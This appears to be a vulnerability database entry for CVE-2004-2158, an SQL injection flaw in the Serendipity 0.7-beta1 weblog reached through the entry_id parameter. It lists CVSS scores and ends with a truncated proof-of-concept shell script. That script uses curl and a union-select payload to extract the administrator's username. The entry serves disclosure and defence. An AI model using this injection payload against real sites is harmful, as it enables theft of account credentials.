7.5
CVSSv2

CVE-2004-2158

Published: 31/12/2004 Updated: 11/07/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in Serendipity 0.7-beta1 allows remote malicious users to execute arbitrary SQL commands via the entry_id parameter to (1) exit.php or (2) comment.php.

Vulnerable Product Search on Vulmon Subscribe to Product

s9y serendipity 0.7_beta1

Exploits

Proof of Concept 1 ------------------ Usage: /ser_sqli_pocsh URL_to_Serendipity_Weblog ser_sqli_pocsh ---------8<-----------8<------------- #!/bin/sh echo -n "Username: " curl -I -s "$1/exitphp?url_id=1&entry_id=1%20and%200%20union%20select%20username%20from%20serendipity_authors%20where%20authorid%3D1" | grep Location | cut -b1 ...